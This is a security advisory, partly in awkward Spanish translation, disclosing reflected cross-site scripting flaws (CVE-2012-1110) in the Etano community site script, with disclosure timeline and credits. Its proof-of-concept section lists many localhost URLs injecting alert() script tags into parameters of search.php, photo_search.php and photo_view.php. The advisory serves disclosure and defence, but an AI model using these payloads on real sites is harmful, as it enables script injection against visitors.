Etano 1.x Multiple Cross Site Scripting vulnerabilidades (CVE-2012-1110)
1. PANORAMA
Etano versiones 1.x son vulnerables a Cross Site Scripting.
2. ANTECEDENTES
El script constructor comunidad Ustedes - Etano - fue construido en su totalidad en base a las peticiones de los clientes del paquete de Contactos en linea (Contactos Site Builder). Casi todas las características cada vez solicitadas fue construido en Etano para ayudarle a construir un mejor sitio para los miembros de la comunidad. Puede utilizar Etano para poner en marcha un sitio de citas, un sitio de redes sociales, un sitio de anuncios o cualquier otro tipo de sitio que participan grupos de personas, empresas, productos.
3. VULNERABILIDAD DESCRIPCIÓN
Varios parámetros no fueron desinfectados adecuadamente tras la presentación como join.php, search.php, photo_search.php y photo_view.php, que permite a un atacante realizar ataques de Cross Site Scripting.
Esto podría permitir a un atacante crear una URL especialmente diseñada que podría ejecutar código de script arbitrario en el navegador de la víctima.
Las versiones afectadas
Probado en las versiones 1.x (01.20 a 01.22)
5. La prueba de concepto / EXPLOIT
URL: http://localhost/etano/search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country , f17_state, f17_zip, f19, wphoto, search, v, return
http://localhost/etano/search.php?'"><script>alert(/XSS/)</script>
http://localhost/etano/search.php?st='"><script>alert(/XSS/)</script>
http://localhost/etano/search.php?f17_city='"><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
http://localhost/etano/search.php?f17_city=0&f17_country='"><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state='"><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1
http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='"><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1
http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='"><script>alert(/XSS/)</script>&st=basic&wphoto=1
http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='"><script>alert(/XSS/)</script>&wphoto=1
http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='"><script>alert(/XSS/)</script>
http://localhost/etano/search.php?search='"><script>alert(/XSS/)</script>&v=g
http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='"><script>alert(/XSS/)</script>
http://localhost/etano/search.php?st=xss"><script>alert(/XSS/)</script>&user=unknown
------------------------------------------------------------------------------------------------
URL: http://localhost/etano/photo_search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, return
http://localhost/etano/photo_search.php?'"><script>alert(/XSS/)</script>
http://localhost/etano/photo_search.php?st='"><script>alert(/XSS/)</script>
------------------------------------------------------------------------------------------------
URL: http://localhost/etano/photo_view.php
Method: GET
Vulnerable Parameter: return
http://localhost/etano/photo_view.php?photo_id=1&return="><script>alert(/XSS/)</script>
6. Solucion
El creador no ha solucionado las vulnerabilidades.
7. Creador
Datemill
http://www.datemill.com/
8. Creditos
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-06-21: notified vendor
2012-03-05: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss
#yehg [2012-03-05]
